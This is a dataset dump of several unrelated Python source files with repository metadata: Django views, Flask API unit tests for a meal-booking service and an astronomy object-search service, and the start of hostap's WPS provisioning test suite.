elif request.method == 'DELETE':
return well_service.delete_well_pumps(self.get_object().id)
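# A deduplication sketch (hypothetical refactor, not part of the original file;
# it assumes well_service keeps the get_well_<name>/delete_well_<name> naming
# convention used above):
# def _child_action(name):
#     @action(detail=True, methods=['get', 'delete'])
#     def handler(self, request, *args, **kwargs):
#         service_fn = getattr(
#             well_service,
#             ('get' if request.method == 'GET' else 'delete') + '_well_' + name,
#         )
#         return service_fn(self.get_object().id)
#     handler.__name__ = name  # DRF derives the route segment from the name
#     return handler
#
# The class body would then read: inclinometry = _child_action('inclinometry'), etc.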
| avg_line_length: 41.903226 | max_line_length: 78 | alphanum_fraction: 0.661278
| (remaining per-file qsc_* quality-signal columns omitted: unlabeled numeric spill)
| hexsha: 6a5833c0f7788c3f94dbea9c2e43ac9f2af892a0 | size: 105 | ext: py | lang: Python
| path: django_test/django_test/views.py | repo: edx/pyinstrument | head: 22ff290b98d24a407fbbe5d9d267536ef0a1c9d6 | licenses: ["BSD-3-Clause"]
| stars: null | issues: 1 (2021-01-27T19:26:38.000Z to 2021-01-27T19:43:50.000Z) | forks: 1 (2015-01-26T14:47:13.000Z)
from django.http import HttpResponse


def hello_world(request):
    return HttpResponse('Hello, world!')
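# A minimal wiring sketch (hypothetical urls.py; the route and the import path
# are assumptions, not shown in the dump):
# from django.urls import path
# from django_test.views import hello_world
#
# urlpatterns = [
#     path('hello/', hello_world),
# ]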
| avg_line_length: 21 | max_line_length: 40 | alphanum_fraction: 0.771429
| (remaining per-file qsc_* quality-signal columns omitted: unlabeled numeric spill)
| hexsha: 6ae0ef220f3d82cdb7388567fe046cf44a422f1a | size: 122 | ext: py | lang: Python
| path: test2.py | repo: maxc-learn/test-repo | head: d2b40f8bb2e5d3befef1d376252c2521374d8055 | licenses: ["MIT"]
| stars: null | issues: 2 (2018-11-01T21:34:07.000Z to 2018-11-01T21:34:12.000Z) | forks: null
""" Test file 2 """
def main():
return "Whoooaaaaa test file 2! This is cool"
if __name__ == "__main__":
main()
| avg_line_length: 15.25 | max_line_length: 49 | alphanum_fraction: 0.598361
| (remaining per-file qsc_* quality-signal columns omitted: unlabeled numeric spill)
| hexsha: 0ab697331d323b15eb4d4492873bcb21e5ccfe03 | size: 7,545 | ext: py | lang: Python
| path: tests/test_meals.py | repo: omarion3698/Book-A-Meal | head: 330a2331ee13b52772d20eedbc00fc4364585709 | licenses: ["MIT"]
| stars: null | issues: null | forks: null
import os
import unittest
from flask import json
from app import create_app, db
from app.custom_http_respones.responses import Success, Error
from app.models.models import User
class TestAuth(unittest.TestCase):
"""Test the meal routes and db"""
def setUp(self):
"""Setting up the variables for testing"""
self.app = create_app(config_name='testing')
self.app.testing = True
self.client = self.app.test_client
self.error = Error()
self.success = Success()
os.environ["SECRET"] = "989d554b-1598-4b77-bf22-0941953cd955"
with self.app.app_context():
# create all tables in the database
db.session.close()
db.drop_all()
db.create_all()
admin = User(email='admin@gmail.com', password='12345678', admin=True)
admin.save()
def test_add_meal_success(self):
"""Admin needs an admin token to add meal"""
res = self.client().post('/auth/login/', data=json.dumps({"email": "admin@gmail.com", "password": "12345678"}))
json_data = json.loads(res.data)
token = json_data['token']
res1 = self.client().post('/meals/', headers=dict(Authorization="Bearer " + token),
data=json.dumps({"name": "rice", "price": 300}))
self.assertEqual(res1.status_code, self.success.ok_status)
def test_add_meal_without_data(self):
"""Test if admin can add meal with not data"""
res = self.client().post('/auth/login/', data=json.dumps({"email": "admin@gmail.com", "password": "12345678"}))
json_data = json.loads(res.data)
token = json_data['token']
res1 = self.client().post('/meals/', headers=dict(Authorization="Bearer " + token),
data=json.dumps({}))
self.assertEqual(res1.status_code, self.error.bad_request_status)
def test_edit_meal_success(self):
res = self.client().post('/auth/login/', data=json.dumps({"email": "admin@gmail.com", "password": "12345678"}))
json_data = json.loads(res.data)
token = json_data['token']
rv = self.client().post('/meals/', headers=dict(Authorization="Bearer " + token),
data=json.dumps({"name": "tender goat", "price": 300}))
rv_json = json.loads(rv.data)
meal_id = rv_json['id']
res = self.client().put('/meals/{}/'.format(meal_id), headers=dict(Authorization="Bearer " + token),
data=json.dumps({"name": "fish", "price": 300}))
self.assertEqual(res.status_code, self.success.ok_status)
def test_edit_meal_with_same_name(self):
res = self.client().post('/auth/login/', data=json.dumps({"email": "admin@gmail.com", "password": "12345678"}))
json_data = json.loads(res.data)
token = json_data['token']
rv = self.client().post('/meals/', headers=dict(Authorization="Bearer " + token),
data=json.dumps({"name": "tender goat", "price": 300}))
rv_json = json.loads(rv.data)
meal_id = rv_json['id']
res = self.client().put('/meals/{}/'.format(meal_id), headers=dict(Authorization="Bearer " + token),
data=json.dumps({"name": "tender goat", "price": 300}))
self.assertEqual(res.status_code, self.error.conflict_status)
def test_edit_meal_with_no_data(self):
res = self.client().post('/auth/login/', data=json.dumps({"email": "admin@gmail.com", "password": "12345678"}))
json_data = json.loads(res.data)
token = json_data['token']
rv = self.client().post('/meals/', headers=dict(Authorization="Bearer " + token),
data=json.dumps({"name": "mushroom", "price": 300}))
rv_json = json.loads(rv.data)
meal_id = rv_json['id']
res = self.client().put('/meals/{}/'.format(meal_id), headers=dict(Authorization="Bearer " + token))
self.assertEqual(res.status_code, self.error.bad_request_status)
def test_edit_non_existing_meal(self):
res = self.client().post('/auth/login/', data=json.dumps({"email": "admin@gmail.com", "password": "12345678"}))
json_data = json.loads(res.data)
token = json_data['token']
res = self.client().put('/meals/-857/', headers=dict(Authorization="Bearer " + token))
self.assertEqual(res.status_code, self.error.not_found_status)
def test_delete_meal_success(self):
res = self.client().post('/auth/login/', data=json.dumps({"email": "admin@gmail.com", "password": "12345678"}))
json_data = json.loads(res.data)
token = json_data['token']
rv = self.client().post('/meals/', headers=dict(Authorization="Bearer " + token),
data=json.dumps({"name": "Cake", "price": 300}))
rv_json = json.loads(rv.data)
meal_id = rv_json['id']
res = self.client().delete('/meals/{}/'.format(meal_id), headers=dict(Authorization="Bearer " + token))
self.assertEqual(res.status_code, self.success.ok_status)
def test_delete_non_existing_meal(self):
res = self.client().post('/auth/login/', data=json.dumps({"email": "admin@gmail.com", "password": "12345678"}))
json_data = json.loads(res.data)
token = json_data['token']
res = self.client().delete('/meals/-485/', headers=dict(Authorization="Bearer " + token))
self.assertEqual(res.status_code, self.error.not_found_status)
def test_admin_login(self):
res = self.client().post('/auth/login/', data=json.dumps({"email": "admin@gmail.com", "password": '12345678'}))
self.assertEqual(res.status_code, self.success.ok_status)
def test_add_meal_without_token(self):
"""Test if only logged user can add meal"""
res = self.client().post('/meals/', data=json.dumps({"name": "rice", "price": 300}))
self.assertEqual(res.status_code, self.error.unauthorized_status)
def test_add_meal_with_invalid_token(self):
"""Test if only admin with valid token can add meal"""
res = self.client().post('/meals/', headers=dict(Authorization="Bearer access_token"),
data=json.dumps({"name": "rice", "price": 300}))
self.assertEqual(res.status_code, self.error.forbidden_status)
def test_get_meals_without_token(self):
"""Test if only logged user can get meals"""
res = self.client().get('/meals/')
self.assertEqual(res.status_code, self.error.unauthorized_status)
def test_get_meals_with_invalid_token(self):
"""Test if only admin with valid token can get meals"""
res = self.client().get('/meals/', headers=dict(Authorization="Bearer access_token"))
self.assertEqual(res.status_code, self.error.forbidden_status)
def test_edit_meal_without_token(self):
"""Test if only logged user can add meal"""
res = self.client().put('/meals/2/', data=json.dumps({"name": "rice", "price": 300}))
self.assertEqual(res.status_code, self.error.unauthorized_status)
def test_edit_meal_with_invalid_token(self):
"""Test if only admin with valid token can edit meal"""
res = self.client().put('/meals/2/', headers=dict(Authorization="Bearer access_token"),
data=json.dumps({"name": "rice", "price": 300}))
self.assertEqual(res.status_code, self.error.forbidden_status)
if __name__ == "__main__":
unittest.main()
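# A deduplication sketch (hypothetical helper, not part of the original file):
# the admin login + token extraction repeated at the top of most tests above
# could live in one method.
# def admin_token(self):
#     res = self.client().post('/auth/login/', data=json.dumps(
#         {"email": "admin@gmail.com", "password": "12345678"}))
#     return json.loads(res.data)['token']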
| avg_line_length: 52.034483 | max_line_length: 119 | alphanum_fraction: 0.619616
| (remaining per-file qsc_* quality-signal columns omitted: unlabeled numeric spill)
| hexsha: 0ad91c05c47e35ce0da4afa6568a02b4dfd65497 | size: 16,028 | ext: py | lang: Python
| path: object_service/tests/test_endpoints.py | repo: marblestation/object_service | head: 73d81fba246a10d4e95266f5269ad14e81f8cea6 | licenses: ["MIT"]
| stars: null | issues: null | forks: null
import sys
import os
from flask_testing import TestCase
from flask import request
from flask import url_for, Flask
import unittest
import requests
import time
from object_service import app
import json
import httpretty
import mock
from requests.exceptions import ConnectTimeout, ReadTimeout
class TestExpectedResults(TestCase):
'''Check if the service returns expected results'''
def create_app(self):
'''Create the wsgi application'''
app_ = app.create_app()
return app_
@httpretty.activate
def test_object_search_200(self):
'''Test to see if calling the object search endpoint
works for valid data'''
QUERY_URL = self.app.config.get('OBJECTS_SIMBAD_TAP_URL')
mockdata = {"data":[[1575544, "NAME ANDROMEDA","NAME ANDROMEDA"],[3133169, "NAME LMC", "NAME LMC"]]}
# We will be doing a POST request with a set of identifiers
identifiers = ["3133169", "1575544"]
# Mock the response
httpretty.register_uri(
httpretty.POST, QUERY_URL,
content_type='application/json',
status=200,
body='%s'%json.dumps(mockdata))
# Do the POST request
r = self.client.post(
url_for('objectsearch'),
content_type='application/json',
data=json.dumps({'identifiers': identifiers}))
# The response should have a status code 200
self.assertTrue(r.status_code == 200)
# See if we received the expected results
expected = {u'3133169': {u'id': '3133169', u'canonical': u'LMC'}, u'1575544': {u'id': '1575544', u'canonical': u'ANDROMEDA'}}
self.assertEqual(r.json, expected)
@httpretty.activate
def test_object_search_500(self):
'''Test to see if a 500 from SIMBAD is processed correctly'''
QUERY_URL = self.app.config.get('OBJECTS_SIMBAD_TAP_URL')
identifiers = ["3133169", "1575544"]
# Mock the response
httpretty.register_uri(
httpretty.POST, QUERY_URL,
content_type='application/json',
status=500,
body='')
# Do the POST request
r = self.client.post(
url_for('objectsearch'),
content_type='application/json',
data=json.dumps({'identifiers': identifiers}))
# See if we received the expected results
self.assertEqual(r.json['Error'], 'Unable to get results!')
self.assertEqual(r.json['Error Info'], 'SIMBAD returned status 500')
@httpretty.activate
def test_object_search_bad_data(self):
'''Test to see if bad data from SIMBAD is processed correctly'''
QUERY_URL = self.app.config.get('OBJECTS_SIMBAD_TAP_URL')
identifiers = ["3133169", "1575544"]
# Mock the response
httpretty.register_uri(
httpretty.POST, QUERY_URL,
content_type='application/json',
status=200,
body='{}')
# Do the POST request
r = self.client.post(
url_for('objectsearch'),
content_type='application/json',
data=json.dumps({'identifiers': identifiers}))
# See if we received the expected results
print(r.json)
self.assertEqual(r.json['Error'], 'Unable to get results!')
self.assertEqual(r.json['Error Info'], 'Bad data returned by SIMBAD')
@httpretty.activate
def test_object_search_empty_list(self):
'''Test to see if an empty id list is processed correctly'''
QUERY_URL = self.app.config.get('OBJECTS_SIMBAD_TAP_URL')
# Mock the response
httpretty.register_uri(
httpretty.POST, QUERY_URL,
content_type='application/json',
status=200,
body='{}')
# Do the POST request
r = self.client.post(
url_for('objectsearch'),
content_type='application/json',
data=json.dumps({}))
# First we omit the 'identifiers' attribute in the input
# See if we received the expected results
self.assertEqual(r.json['Error'], 'Unable to get results!')
self.assertEqual(r.json['Error Info'], 'No identifiers/objects found in POST body')
# The same should happen with an empty identifiers list
identifiers = []
r = self.client.post(
url_for('objectsearch'),
content_type='application/json',
data=json.dumps({'identifiers': identifiers}))
# See if we received the expected results
self.assertEqual(r.json['Error'], 'Unable to get results!')
self.assertEqual(r.json['Error Info'], 'No identifiers/objects found in POST body')
@httpretty.activate
def test_position_search_200(self):
'''Test to see if calling the position search endpoint
works for valid data'''
# Define mock data to be returned to mock external SIMBAD query
SIMBAD_QUERY_URL = self.app.config.get('OBJECTS_SIMBAD_TAP_URL')
simbad_mockdata = {"data":[[1575544, "NAME ANDROMEDA","NAME ANDROMEDA"],[3133169, "NAME LMC", "NAME LMC"],[3253618, "NAME SMC", "NAME SMC"]]}
# Define mock data to be returned to mock external NED query
NED_QUERY_URL = self.app.config.get('OBJECTS_NED_OBJSEARCH')
ned_mockdata = "\n".join(['bibcode1|Andromeda|foo|bar'])
# The test query we will provide
query = 'bibstem:A&A object:"80.89416667 -69.75611111:0.166666" year:2015'
# Mock the SIMBAD response
httpretty.register_uri(
httpretty.POST, SIMBAD_QUERY_URL,
content_type='application/json',
status=200,
body='%s'%json.dumps(simbad_mockdata))
# Mock the NED response
httpretty.register_uri(
httpretty.GET, NED_QUERY_URL,
content_type='text/plain',
status=200,
body='%s'%json.dumps(ned_mockdata))
# Do the POST request
r = self.client.post(
url_for('querysearch'),
content_type='application/json',
data=json.dumps({'query': query}))
# The response should have a status code 200
# See if we received the expected results
expected = {u'query': u'bibstem:A&A (simbid:(3253618 OR 1575544 OR 3133169) OR nedid:(Andromeda)) year:2015'}
self.assertEqual(r.json, expected)
@httpretty.activate
def test_position_search_NED_SIMBAD_error(self):
'''Test to see if calling the position search endpoint
works for valid data'''
def exceptionCallback(request, uri, headers):
service = 'SIMBAD'
if 'caltech' in uri:
service = 'NED'
raise Exception('Query to {0} blew up!'.format(service))
# Define mock data to be returned to mock external SIMBAD query
SIMBAD_QUERY_URL = self.app.config.get('OBJECTS_SIMBAD_TAP_URL')
simbad_mockdata = {"data":[[1575544, "NAME ANDROMEDA","NAME ANDROMEDA"],[3133169, "NAME LMC", "NAME LMC"],[3253618, "NAME SMC", "NAME SMC"]]}
# Define mock data to be returned to mock external NED query
NED_QUERY_URL = self.app.config.get('OBJECTS_NED_OBJSEARCH')
ned_mockdata = "\n".join(['bibcode1|Andromeda|foo|bar'])
# The test query we will provide
query = 'bibstem:A&A object:"80.89416667 -69.75611111:0.166666" year:2015'
# Mock the SIMBAD response
httpretty.register_uri(
httpretty.POST, SIMBAD_QUERY_URL,
content_type='application/json',
body=exceptionCallback)
# Mock the NED response
httpretty.register_uri(
httpretty.GET, NED_QUERY_URL,
content_type='text/plain',
body=exceptionCallback)
# Do the POST request
r = self.client.post(
url_for('querysearch'),
content_type='application/json',
data=json.dumps({'query': query}))
# The response should have a status code 200
# See if we received the expected results
expected = {'Error':'Unable to get results!',
'Error Info':'SIMBAD position query blew up (Query to SIMBAD blew up!), NED cone search failed (Query to NED blew up!)'}
self.assertEqual(r.json, expected)
@httpretty.activate
def test_id_search_200(self):
'''Test to see if calling the id search endpoint
works for valid data'''
QUERY_URL = self.app.config.get('OBJECTS_SIMBAD_TAP_URL')
mockdata = {"data":[[1575544, "NAME ANDROMEDA","NAME ANDROMEDA"],
[3133169, "NAME LMC", "NAME LMC"],
[1471968,"* 51 Peg b","* 51 Peg b"],
[1471968,"NAME Dimidium","* 51 Peg b"],
[3267798,"V* W Cen","V* W Cen"]]}
# We will be doing a POST request with a set of identifiers
objects = ["Andromeda", "LMC", "51 Peg b", "Dimidium", "w Cen"]
# Mock the response
httpretty.register_uri(
httpretty.POST, QUERY_URL,
content_type='application/json',
status=200,
body='%s'%json.dumps(mockdata))
# Do the POST request
r = self.client.post(
url_for('objectsearch'),
content_type='application/json',
data=json.dumps({'objects': objects}))
# The response should have a status code 200
self.assertTrue(r.status_code == 200)
# See if we received the expected results
expected = {'LMC': {'id': '3133169', 'canonical': 'LMC'},
'Andromeda': {'id': '1575544', 'canonical': 'ANDROMEDA'},
'51 Peg b': {'id': '1471968', 'canonical': '51 Peg b'},
'Dimidium': {'id': '1471968', 'canonical': '51 Peg b'},
'w Cen': {'id': '3267798', 'canonical': 'W Cen'}}
self.assertEqual(r.json, expected)
@httpretty.activate
def test_query_search_200(self):
'''test translation Solr query with "object:" modifier'''
# Define mock data to be returned to mock external SIMBAD query
SIMBAD_QUERY_URL = self.app.config.get('OBJECTS_SIMBAD_TAP_URL')
simbad_mockdata = {"data":[[1575544, "NAME ANDROMEDA","NAME ANDROMEDA"],[3133169, "NAME LMC", "NAME LMC"],[3253618, "NAME SMC", "NAME SMC"]]}
# Define mock data to be returned to mock external NED query
NED_QUERY_URL = self.app.config.get('OBJECTS_NED_URL')
ned_mockdata = {'NameResolver': 'NED-Egret',
'Copyright': '(C) 2017 California Institute of Technology',
'Preferred': {'Name': 'Andromeda'},
'ResultCode': 3,
'StatusCode': 100}
# The test query we will provide
query = 'bibstem:A&A object:Andromeda year:2015'
# Mock the SIMBAD response
httpretty.register_uri(
httpretty.POST, SIMBAD_QUERY_URL,
content_type='application/json',
status=200,
body='%s'%json.dumps(simbad_mockdata))
# Mock the NED response
httpretty.register_uri(
httpretty.POST, NED_QUERY_URL,
content_type='application/json',
status=200,
body='%s'%json.dumps(ned_mockdata))
# Do the POST request
r = self.client.post(
url_for('querysearch'),
content_type='application/json',
data=json.dumps({'query': query}))
# The response should have a status code 200
# See if we received the expected results
expected = {'query': 'bibstem:A&A ((abs:Andromeda OR simbid:1575544 OR nedid:Andromeda) database:astronomy) year:2015'}
self.assertEqual(r.json, expected)
@httpretty.activate
def test_list_query_search_200(self):
'''test translation Solr query (submitted as list) with "object:" modifier'''
# Define mock data to be returned to mock external SIMBAD query
SIMBAD_QUERY_URL = self.app.config.get('OBJECTS_SIMBAD_TAP_URL')
simbad_mockdata = {"data":[[1575544, "NAME ANDROMEDA","NAME ANDROMEDA"],[3133169, "NAME LMC", "NAME LMC"],[3253618, "NAME SMC", "NAME SMC"]]}
# Define mock data to be returned to mock external NED query
NED_QUERY_URL = self.app.config.get('OBJECTS_NED_URL')
ned_mockdata = {'NameResolver': 'NED-Egret',
'Copyright': '(C) 2017 California Institute of Technology',
'Preferred': {'Name': 'Andromeda'},
'ResultCode': 3,
'StatusCode': 100}
# The test query we will provide
query = ['bibstem:A&A object:Andromeda year:2015']
# Mock the SIMBAD response
httpretty.register_uri(
httpretty.POST, SIMBAD_QUERY_URL,
content_type='application/json',
status=200,
body='%s'%json.dumps(simbad_mockdata))
# Mock the NED response
httpretty.register_uri(
httpretty.POST, NED_QUERY_URL,
content_type='application/json',
status=200,
body='%s'%json.dumps(ned_mockdata))
# Do the POST request
r = self.client.post(
url_for('querysearch'),
content_type='application/json',
data=json.dumps({'query': query}))
# The response should have a status code 200
# See if we received the expected results
expected = {'query': 'bibstem:A&A ((abs:Andromeda OR simbid:1575544 OR nedid:Andromeda) database:astronomy) year:2015'}
self.assertEqual(r.json, expected)
def test_object_search_empty_query(self):
'''An empty query string should result in an error'''
r = self.client.post(
url_for('querysearch'),
content_type='application/json',
data=json.dumps({}))
# The response should have a status code 200
self.assertTrue(r.status_code == 200)
# See if we received the expected results
expected = {"Error": "Unable to get results!",
"Error Info": "No identifiers/objects found in POST body"}
self.assertEqual(r.json, expected)
def exceptionCallback():
return Exception('Something went wrong!')
@mock.patch('object_service.utils.isBalanced')
def test_query_search_parsing_error(self, mock_isBalanced):
mock_isBalanced.side_effect = Exception('Something went wrong!')
query = 'bibstem:A&A object:Andromeda year:2015'
r = self.client.post(
url_for('querysearch'),
content_type='application/json',
data=json.dumps({'query': query}))
# The response should have a status code 200
self.assertTrue(r.status_code == 200)
# See if we received the expected results
expected = {"Error": "Unable to get results!",
"Error Info": 'Parsing the identifiers out of the query string blew up! (Something went wrong!)'}
self.assertEqual(r.json, expected)
def test_object_search_unknown_source(self):
'''Test to see if calling the object search endpoint
with an unknown source throws an error'''
# We will be doing a POST request with a set of identifiers
identifiers = ["3133169", "1575544"]
source = "edwin"
# Do the POST request
r = self.client.post(
url_for('objectsearch'),
content_type='application/json',
data=json.dumps({'identifiers': identifiers, 'source':source}))
# The response should have a status code 200
self.assertTrue(r.status_code == 200)
# See if we received the expected results
expected = {"Error": "Unable to get results!",
"Error Info": "Unsupported source for object data specified: %s"%source}
self.assertEqual(r.json, expected)
if __name__ == '__main__':
unittest.main()
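# A small request-helper sketch (hypothetical, not part of the original file;
# it would trim the repeated POST boilerplate in the tests above):
# def post_json(self, endpoint, payload):
#     return self.client.post(url_for(endpoint),
#                             content_type='application/json',
#                             data=json.dumps(payload))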
| avg_line_length: 45.925501 | max_line_length: 150 | alphanum_fraction: 0.606751
| (remaining per-file qsc_* quality-signal columns omitted: unlabeled numeric spill)
| hexsha: 7c3089d94693141eb315c71f94c90d4bbe41f2c2 | size: 406,733 | ext: py | lang: Python
| path: tests/hwsim/test_ap_wps.py | repo: rainlake/hostap | head: b9cd4f5e75dc4a7aa3b547925cfb871b6aa103f7 | licenses: ["Unlicense"]
| stars: null | issues: null | forks: 1 (2022-03-25T08:21:36.000Z)
# WPS tests
# Copyright (c) 2013-2017, Jouni Malinen <j@w1.fi>
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.
from remotehost import remote_compatible
import base64
import binascii
from Crypto.Cipher import AES
import hashlib
import hmac
import os
import time
import sys
import stat
import subprocess
import logging
logger = logging.getLogger()
import re
import socket
import struct
try:
from http.client import HTTPConnection
from urllib.request import urlopen
from urllib.parse import urlparse, urljoin
from urllib.error import HTTPError
from io import StringIO
from socketserver import StreamRequestHandler, TCPServer
except ImportError:
from httplib import HTTPConnection
from urllib import urlopen
from urlparse import urlparse, urljoin
from urllib2 import build_opener, ProxyHandler, HTTPError
from StringIO import StringIO
from SocketServer import StreamRequestHandler, TCPServer
import urllib
import xml.etree.ElementTree as ET
import hwsim_utils
import hostapd
from wpasupplicant import WpaSupplicant
from utils import HwsimSkip, alloc_fail, fail_test, skip_with_fips
from utils import wait_fail_trigger
from test_ap_eap import int_eap_server_params
def wps_start_ap(apdev, ssid="test-wps-conf"):
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP" }
return hostapd.add_ap(apdev, params)
@remote_compatible
def test_ap_wps_init(dev, apdev):
"""Initial AP configuration with first WPS Enrollee"""
ssid = "test-wps"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "1" })
logger.info("WPS provisioning step")
hapd.request("WPS_PBC")
if "PBC Status: Active" not in hapd.request("WPS_GET_STATUS"):
raise Exception("PBC status not shown correctly")
id = dev[0].add_network()
dev[0].set_network_quoted(id, "ssid", "home")
dev[0].set_network_quoted(id, "psk", "12345678")
dev[0].request("ENABLE_NETWORK %s no-connect" % id)
id = dev[0].add_network()
dev[0].set_network_quoted(id, "ssid", "home2")
dev[0].set_network(id, "bssid", "00:11:22:33:44:55")
dev[0].set_network(id, "key_mgmt", "NONE")
dev[0].request("ENABLE_NETWORK %s no-connect" % id)
dev[0].request("WPS_PBC")
dev[0].wait_connected(timeout=30)
status = dev[0].get_status()
if status['wpa_state'] != 'COMPLETED' or status['bssid'] != apdev[0]['bssid']:
raise Exception("Not fully connected")
if status['ssid'] != ssid:
raise Exception("Unexpected SSID")
if status['pairwise_cipher'] != 'CCMP':
raise Exception("Unexpected encryption configuration")
if status['key_mgmt'] != 'WPA2-PSK':
raise Exception("Unexpected key_mgmt")
status = hapd.request("WPS_GET_STATUS")
if "PBC Status: Disabled" not in status:
raise Exception("PBC status not shown correctly")
if "Last WPS result: Success" not in status:
raise Exception("Last WPS result not shown correctly")
if "Peer Address: " + dev[0].p2p_interface_addr() not in status:
raise Exception("Peer address not shown correctly")
conf = hapd.request("GET_CONFIG")
if "wps_state=configured" not in conf:
raise Exception("AP not in WPS configured state")
if "wpa=3" not in conf:
raise Exception("AP not in WPA+WPA2 configuration")
if "rsn_pairwise_cipher=CCMP TKIP" not in conf:
raise Exception("Unexpected rsn_pairwise_cipher")
if "wpa_pairwise_cipher=CCMP TKIP" not in conf:
raise Exception("Unexpected wpa_pairwise_cipher")
if "group_cipher=TKIP" not in conf:
raise Exception("Unexpected group_cipher")
if len(dev[0].list_networks()) != 3:
raise Exception("Unexpected number of network blocks")
def test_ap_wps_init_2ap_pbc(dev, apdev):
"""Initial two-radio AP configuration with first WPS PBC Enrollee"""
ssid = "test-wps"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "1" }
hapd = hostapd.add_ap(apdev[0], params)
hostapd.add_ap(apdev[1], params)
logger.info("WPS provisioning step")
hapd.request("WPS_PBC")
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412", force_scan=True)
dev[0].scan_for_bss(apdev[1]['bssid'], freq="2412")
bss = dev[0].get_bss(apdev[0]['bssid'])
if "[WPS-PBC]" not in bss['flags']:
raise Exception("WPS-PBC flag missing from AP1")
bss = dev[0].get_bss(apdev[1]['bssid'])
if "[WPS-PBC]" not in bss['flags']:
raise Exception("WPS-PBC flag missing from AP2")
dev[0].dump_monitor()
dev[0].request("SET wps_cred_processing 2")
dev[0].request("WPS_PBC")
ev = dev[0].wait_event(["WPS-CRED-RECEIVED"], timeout=30)
dev[0].request("SET wps_cred_processing 0")
if ev is None:
raise Exception("WPS cred event not seen")
if "100e" not in ev:
raise Exception("WPS attributes not included in the cred event")
dev[0].wait_connected(timeout=30)
dev[1].scan_for_bss(apdev[0]['bssid'], freq="2412", force_scan=True)
dev[1].scan_for_bss(apdev[1]['bssid'], freq="2412")
bss = dev[1].get_bss(apdev[0]['bssid'])
if "[WPS-PBC]" in bss['flags']:
raise Exception("WPS-PBC flag not cleared from AP1")
bss = dev[1].get_bss(apdev[1]['bssid'])
if "[WPS-PBC]" in bss['flags']:
raise Exception("WPS-PBC flag not cleared from AP2")
def test_ap_wps_init_2ap_pin(dev, apdev):
"""Initial two-radio AP configuration with first WPS PIN Enrollee"""
ssid = "test-wps"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "1" }
hapd = hostapd.add_ap(apdev[0], params)
hostapd.add_ap(apdev[1], params)
logger.info("WPS provisioning step")
pin = dev[0].wps_read_pin()
hapd.request("WPS_PIN any " + pin)
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412", force_scan=True)
dev[0].scan_for_bss(apdev[1]['bssid'], freq="2412")
bss = dev[0].get_bss(apdev[0]['bssid'])
if "[WPS-AUTH]" not in bss['flags']:
raise Exception("WPS-AUTH flag missing from AP1")
bss = dev[0].get_bss(apdev[1]['bssid'])
if "[WPS-AUTH]" not in bss['flags']:
raise Exception("WPS-AUTH flag missing from AP2")
dev[0].dump_monitor()
dev[0].request("WPS_PIN any " + pin)
dev[0].wait_connected(timeout=30)
dev[1].scan_for_bss(apdev[0]['bssid'], freq="2412", force_scan=True)
dev[1].scan_for_bss(apdev[1]['bssid'], freq="2412")
bss = dev[1].get_bss(apdev[0]['bssid'])
if "[WPS-AUTH]" in bss['flags']:
raise Exception("WPS-AUTH flag not cleared from AP1")
bss = dev[1].get_bss(apdev[1]['bssid'])
if "[WPS-AUTH]" in bss['flags']:
raise Exception("WPS-AUTH flag not cleared from AP2")
@remote_compatible
def test_ap_wps_init_through_wps_config(dev, apdev):
"""Initial AP configuration using wps_config command"""
ssid = "test-wps-init-config"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "1" })
if "FAIL" in hapd.request("WPS_CONFIG " + binascii.hexlify(ssid.encode()).decode() + " WPA2PSK CCMP " + binascii.hexlify(b"12345678").decode()):
raise Exception("WPS_CONFIG command failed")
ev = hapd.wait_event(["WPS-NEW-AP-SETTINGS"], timeout=5)
if ev is None:
raise Exception("Timeout on WPS-NEW-AP-SETTINGS events")
# It takes some time for the AP to update Beacon and Probe Response frames,
# so wait here before requesting the scan to be started to avoid adding
# extra five second wait to the test due to fetching obsolete scan results.
hapd.ping()
time.sleep(0.2)
dev[0].connect(ssid, psk="12345678", scan_freq="2412", proto="WPA2",
pairwise="CCMP", group="CCMP")
if "FAIL" not in hapd.request("WPS_CONFIG foo"):
raise Exception("Invalid WPS_CONFIG accepted")
@remote_compatible
def test_ap_wps_init_through_wps_config_2(dev, apdev):
"""AP configuration using wps_config and wps_cred_processing=2"""
ssid = "test-wps-init-config"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "1",
"wps_cred_processing": "2" })
if "FAIL" in hapd.request("WPS_CONFIG " + binascii.hexlify(ssid.encode()).decode() + " WPA2PSK CCMP " + binascii.hexlify(b"12345678").decode()):
raise Exception("WPS_CONFIG command failed")
ev = hapd.wait_event(["WPS-NEW-AP-SETTINGS"], timeout=5)
if ev is None:
raise Exception("Timeout on WPS-NEW-AP-SETTINGS events")
if "100e" not in ev:
raise Exception("WPS-NEW-AP-SETTINGS did not include Credential")
@remote_compatible
def test_ap_wps_invalid_wps_config_passphrase(dev, apdev):
"""AP configuration using wps_config command with invalid passphrase"""
ssid = "test-wps-init-config"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "1" })
if "FAIL" not in hapd.request("WPS_CONFIG " + binascii.hexlify(ssid.encode()).decode() + " WPA2PSK CCMP " + binascii.hexlify(b"1234567").decode()):
raise Exception("Invalid WPS_CONFIG command accepted")
def test_ap_wps_conf(dev, apdev):
"""WPS PBC provisioning with configured AP"""
ssid = "test-wps-conf"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP"})
logger.info("WPS provisioning step")
hapd.request("WPS_PBC")
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].dump_monitor()
dev[0].request("WPS_PBC " + apdev[0]['bssid'])
dev[0].wait_connected(timeout=30)
status = dev[0].get_status()
if status['wpa_state'] != 'COMPLETED':
raise Exception("Not fully connected")
if status['bssid'] != apdev[0]['bssid']:
raise Exception("Unexpected BSSID")
if status['ssid'] != ssid:
raise Exception("Unexpected SSID")
if status['pairwise_cipher'] != 'CCMP' or status['group_cipher'] != 'CCMP':
raise Exception("Unexpected encryption configuration")
